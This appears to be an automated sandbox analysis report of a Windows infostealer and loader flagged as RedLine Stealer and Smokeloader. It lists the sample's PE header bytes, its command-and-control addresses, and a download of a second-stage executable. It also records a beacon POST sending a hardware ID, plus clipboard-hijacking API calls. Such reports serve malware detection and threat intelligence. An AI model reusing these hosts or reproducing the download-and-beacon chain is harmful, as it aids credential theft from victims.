1a 06 7b eb 1d 06 7a eb 74 06 7b eb 03 54 f1 eb 1c 06 7b eb 03 54 ef eb 1c 06 7b eb 03 54 ea eb 1c 06 7b eb 52 69 63 68 1d 06 7b eb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 87 15 2e 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f2 02 00 00 1e 3f 00 00 00 00 00 f7 14 00 00 00 10 00 00 00 10 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 42 00 00 04 00 00 92 85 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 28 03 00 3c 00 00 00 00 00 41 00 d0 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 03 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dc f1 02 00 00 10 00 00 00 f2 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c 20 00 00 00 10 03 00 00 22 00 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 b0 3d 00 00 40 03 00 00 6c 00 00 00 18 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d0 1c 01 00 00 00 41 00 00 1e 01 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 92.255.57.89Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /45c616e921a794b8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEGDBKFIJDAKFIDGHJEHost: 92.255.57.89Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 47 44 42 4b 46 49 4a 44 41 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 46 37 33 34 44 36 42 46 46 34 38 32 36 30 34 39 38 32 31 36 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 47 44 42 4b 46 49 4a 44 41 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 47 44 42 4b 46 49 4a 44 41 4b 46 49 44 47 48 4a 45 2d 2d 0d 0a Data Ascii: ------KJEGDBKFIJDAKFIDGHJEContent-Disposition: form-data; name="hwid"CF734D6BFF482604982160------KJEGDBKFIJDAKFIDGHJEContent-Disposition: form-data; name="build"default------KJEGDBKFIJDAKFIDGHJE--

Source: Joe Sandbox View

IP Address: 104.21.56.70 104.21.56.70

Source: Joe Sandbox View

ASN Name: TELSPRU TELSPRU

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49706 -> 176.113.115.19:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49705 -> 104.21.56.70:443

Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe

Code function: 0_2_004029F4 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_004029F4

Source: global traffic	HTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
Source: global traffic	HTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.19
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 92.255.57.89Connection: Keep-AliveCache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: post-to-me.com

Source: unknown

HTTP traffic detected: POST /45c616e921a794b8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEGDBKFIJDAKFIDGHJEHost: 92.255.57.89Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 47 44 42 4b 46 49 4a 44 41 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 46 37 33 34 44 36 42 46 46 34 38 32 36 30 34 39 38 32 31 36 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 47 44 42 4b 46 49 4a 44 41 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 47 44 42 4b 46 49 4a 44 41 4b 46 49 44 47 48 4a 45 2d 2d 0d 0a Data Ascii: ------KJEGDBKFIJDAKFIDGHJEContent-Disposition: form-data; name="hwid"CF734D6BFF482604982160------KJEGDBKFIJDAKFIDGHJEContent-Disposition: form-data; name="build"default------KJEGDBKFIJDAKFIDGHJE--

Source: 7gxaFDUSOD.exe, 7gxaFDUSOD.exe, 00000000.00000002.3887769418.0000000000A57000.00000004.00000020.00020000.00000000.sdmp, 7gxaFDUSOD.exe, 00000000.00000003.1505542790.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, 7gxaFDUSOD.exe, 00000000.00000002.3887769418.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe
Source: 7gxaFDUSOD.exe, 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE
Source: 4CC1.tmp.exe, 00000003.00000002.1975546939.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 4CC1.tmp.exe, 00000003.00000002.1975471627.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, 4CC1.tmp.exe, 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmp, 4CC1.tmp.exe, 00000003.00000002.1975546939.0000000000966000.00000004.00000020.00020000.00000000.sdmp, 4CC1.tmp.exe, 00000003.00000002.1974878121.00000000004AF000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: http://92.255.57.89
Source: 4CC1.tmp.exe, 00000003.00000002.1975546939.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 4CC1.tmp.exe, 00000003.00000002.1975546939.0000000000966000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89/
Source: 4CC1.tmp.exe, 00000003.00000002.1975546939.0000000000948000.00000004.00000020.00020000.00000000.sdmp, 4CC1.tmp.exe, 00000003.00000002.1975546939.0000000000940000.00000004.00000020.00020000.00000000.sdmp, 4CC1.tmp.exe, 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: http://92.255.57.89/45c616e921a794b8.php
Source: 4CC1.tmp.exe, 00000003.00000002.1975546939.0000000000948000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89/45c616e921a794b8.php3
Source: 4CC1.tmp.exe, 00000003.00000002.1975546939.0000000000948000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89/45c616e921a794b8.php8(
Source: 4CC1.tmp.exe, 00000003.00000002.1975546939.0000000000940000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89/45c616e921a794b8.phpG0
Source: 4CC1.tmp.exe, 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: http://92.255.57.89/45c616e921a794b8.phpwininit.exe
Source: 4CC1.tmp.exe, 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmp, 4CC1.tmp.exe, 00000003.00000002.1975546939.0000000000966000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89/697b92cb4e247842/sqlite3.dll
Source: 4CC1.tmp.exe, 00000003.00000002.1975546939.0000000000966000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89/697b92cb4e247842/sqlite3.dll3g
Source: 4CC1.tmp.exe, 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: http://92.255.57.89/697b92cb4e247842/sqlite3.dllexe
Source: 4CC1.tmp.exe, 00000003.00000002.1975546939.0000000000948000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89/697b92cb4e247842/sqlite3.dllll
Source: 4CC1.tmp.exe, 00000003.00000002.1975546939.0000000000948000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89/697b92cb4e247842/sqlite3.dllll#
Source: 4CC1.tmp.exe, 00000003.00000002.1975546939.0000000000909000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.899
Source: 4CC1.tmp.exe, 00000003.00000002.1974878121.00000000004AF000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: http://92.255.57.89IDGHJE
Source: 4CC1.tmp.exe, 00000003.00000002.1975471627.00000000008DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89s
Source: 4CC1.tmp.exe, 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: http://92.255.57.89smss.exe
Source: 7gxaFDUSOD.exe, 00000000.00000003.1505596518.0000000003175000.00000004.00000020.00020000.00000000.sdmp, 7gxaFDUSOD.exe, 00000000.00000003.1809637832.0000000003175000.00000004.00000020.00020000.00000000.sdmp, 7gxaFDUSOD.exe, 00000000.00000003.1480766151.0000000003175000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: Amcache.hve.7.dr	String found in binary or memory: http://upx.sf.net
Source: 7gxaFDUSOD.exe, 00000000.00000002.3887769418.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/
Source: 7gxaFDUSOD.exe	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=
Source: 7gxaFDUSOD.exe, 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
Source: 7gxaFDUSOD.exe, 00000000.00000002.3887769418.00000000009E6000.00000004.00000020.00020000.00000000.sdmp, 7gxaFDUSOD.exe, 00000000.00000003.1480681171.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE

Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705

Source: unknown

HTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.8:49705 version: TLS 1.2

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe

Code function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,

0_2_004016DF

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,		0_2_004016DF
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_02471942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,		0_2_02471942

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe

0_2_004016DF

Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe

Code function: 3_2_004097A0 memset,memset,lstrcatA,lstrcatA,lstrcatA,memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcatA,lstrcatA,lstrcatA,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlenA,wsprintfA,lstrcpy,memset,CreateProcessA,Sleep,CloseDesktop,

3_2_004097A0

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.3887735397.00000000009A9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000003.00000002.1975524031.00000000008EA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_02472361 NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,		0_2_02472361
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_02472605 NtdllDefWindowProc_W,PostQuitMessage,		0_2_02472605

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_00428022	0_2_00428022
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_004071AB	0_2_004071AB
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_004373D9	0_2_004373D9
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_0042D4EE	0_2_0042D4EE
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_00427484	0_2_00427484
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_00428560	0_2_00428560
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_0043D678	0_2_0043D678
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_004166AF	0_2_004166AF
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_00413725	0_2_00413725
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_004277F6	0_2_004277F6
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_0040E974	0_2_0040E974
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_0042EAE0	0_2_0042EAE0
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_00427AA0	0_2_00427AA0
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_00418AAF	0_2_00418AAF
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_00436CBF	0_2_00436CBF
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_00427D67	0_2_00427D67
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_00413F0B	0_2_00413F0B
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_02498289	0_2_02498289
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_0249ED47	0_2_0249ED47
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_02484172	0_2_02484172
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_024976EB	0_2_024976EB
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_0249D755	0_2_0249D755
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_024987C7	0_2_024987C7
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_02497A5D	0_2_02497A5D
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_0247EBDB	0_2_0247EBDB
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_02486916	0_2_02486916
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_0248398C	0_2_0248398C
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_024A6F26	0_2_024A6F26
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_02497FCE	0_2_02497FCE
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_0249ED47	0_2_0249ED47
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_02497D07	0_2_02497D07
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_02488D16	0_2_02488D16
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_02474B37	3_2_02474B37

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: String function: 02480019 appears 121 times
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: String function: 00410720 appears 53 times
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: String function: 0040F903 appears 36 times
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: String function: 02480987 appears 53 times
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: String function: 0040FDB2 appears 125 times
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: String function: 00404980 appears 317 times

Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3628 -s 1316

Source: 7gxaFDUSOD.exe	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 4CC1.tmp.exe.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: 7gxaFDUSOD.exe	Binary or memory string: OriginalFileName vs 7gxaFDUSOD.exe
Source: 7gxaFDUSOD.exe, 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs 7gxaFDUSOD.exe
Source: 7gxaFDUSOD.exe, 00000000.00000003.1450374262.00000000024E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs 7gxaFDUSOD.exe
Source: 7gxaFDUSOD.exe, 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs 7gxaFDUSOD.exe

Source: 7gxaFDUSOD.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.3887735397.00000000009A9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000003.00000002.1975524031.00000000008EA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: 7gxaFDUSOD.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 4CC1.tmp.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@4/6@1/3

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe

Code function: 0_2_009A9FB6 CreateToolhelp32Snapshot,Module32First,

0_2_009A9FB6

Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe

Code function: 3_2_0246CE47 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

3_2_0246CE47

Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\QR2RQGZH.htm

Jump to behavior

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Mutant created: \Sessions\1\BaseNamedObjects\5rjtejk5rytrr
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3628

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe

File created: C:\Users\user\AppData\Local\Temp\4CC1.tmp

Jump to behavior

Source: 7gxaFDUSOD.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 7gxaFDUSOD.exe

ReversingLabs: Detection: 47%

Source: unknown	Process created: C:\Users\user\Desktop\7gxaFDUSOD.exe "C:\Users\user\Desktop\7gxaFDUSOD.exe"
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Process created: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe "C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe"
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3628 -s 1316
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Process created: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe "C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe"	Jump to behavior

